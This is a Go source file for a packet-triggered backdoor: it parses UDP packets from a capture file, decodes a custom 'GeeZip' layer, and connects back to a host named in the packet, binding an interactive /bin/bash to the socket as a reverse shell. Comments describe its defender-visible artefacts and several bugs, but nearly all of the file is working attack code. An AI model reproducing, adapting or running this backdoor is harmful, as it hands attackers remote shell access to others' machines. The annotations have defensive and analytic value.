package main
import (
"encoding/hex"
"log"
"net"
"os"
"os/exec"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"github.com/google/gopacket/pcap"
)
// end is the channel main receives from once the capture has been processed.
// It is nil until main allocates it with a buffer of one.
var (
	end chan int
)
// doRat connects back to host over TCP and attaches an interactive bash
// process to that connection; it is the reverse-shell stage of this tool.
//
// trigger is only echoed, hex-encoded, in the banner written to the remote
// end. host is passed to net.Dial unchanged. Both values are supplied by
// handlePacket from the decoded packet, so the packet's author chooses the
// destination.
//
// Defender notes: nothing in this function authenticates the sender or
// restricts the destination. The observable artefacts are an outbound TCP
// connection followed by a "/bin/bash -i" child whose stdin, stdout and
// stderr are that socket. The banner text is sent in clear and is a usable
// network signature.
func doRat(trigger []byte, host string) {
conn, err := net.Dial("tcp", host)
if err != nil {
return // fail silently: a failed dial leaves no log entry or other output
}
defer conn.Close()
// Banner discloses the trigger key to the remote end; the Write error is ignored.
conn.Write([]byte("Received trigger packet with key=" + hex.EncodeToString(trigger) + ", spawning a shell...\n"))
// Interactive bash with all three standard streams bound to the socket.
cmd := exec.Command("/bin/bash", "-i")
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
// Run blocks until the shell exits, so the caller is stalled for the whole
// session; the returned error is discarded.
cmd.Run()
}
// handlePacket inspects one captured packet and, when its transport layer is
// UDP, decodes the UDP payload as a GeeZip layer and passes that layer's
// TriggerFlag and CBString fields to doRat.
//
// GeeZipLayerType and GeeZipLayer are not declared in this file.
//
// NOTE(review): the UDP payload is the only input examined here; no source
// address, port or key comparison is visible, so presumably any payload that
// decodes as a GeeZip layer starts the connect-back — confirm against the
// decoder.
func handlePacket(pkt gopacket.Packet) {
if t := pkt.TransportLayer(); t != nil && t.LayerType() == layers.LayerTypeUDP {
// Re-parse the UDP payload with GeeZip as the first layer, decoding lazily.
if p := gopacket.NewPacket(t.LayerPayload(), GeeZipLayerType, gopacket.Lazy); p != nil {
l := p.Layer(GeeZipLayerType)
// NOTE(review): both type assertions are unchecked. If Layer returns nil
// (the payload did not decode) or holds a different concrete type, this
// line panics and the process exits.
doRat(l.(GeeZipLayer).TriggerFlag, l.(GeeZipLayer).CBString)
}
}
}
// main replays a capture file through handlePacket.
//
// It expects exactly one argument, the path of a pcap file, which is opened
// with pcap.OpenOffline; no live interface is opened here. Every packet in
// the file is passed to handlePacket in order.
//
// NOTE(review): nothing in the visible source sends on end, so the final
// receive is expected to block once the capture has been drained — confirm
// against the rest of the package. The pcap handle is never closed.
func main() {
	end = make(chan int, 1)

	if len(os.Args) != 2 {
		log.Fatalf("Usage: %s <filename>\n", os.Args[0])
	}

	capture, openErr := pcap.OpenOffline(os.Args[1])
	if openErr != nil {
		panic(openErr)
	}

	stream := gopacket.NewPacketSource(capture, capture.LinkType())
	pkts := stream.Packets()
	for {
		pkt, more := <-pkts
		if !more {
			break
		}
		handlePacket(pkt)
	}

	<-end
}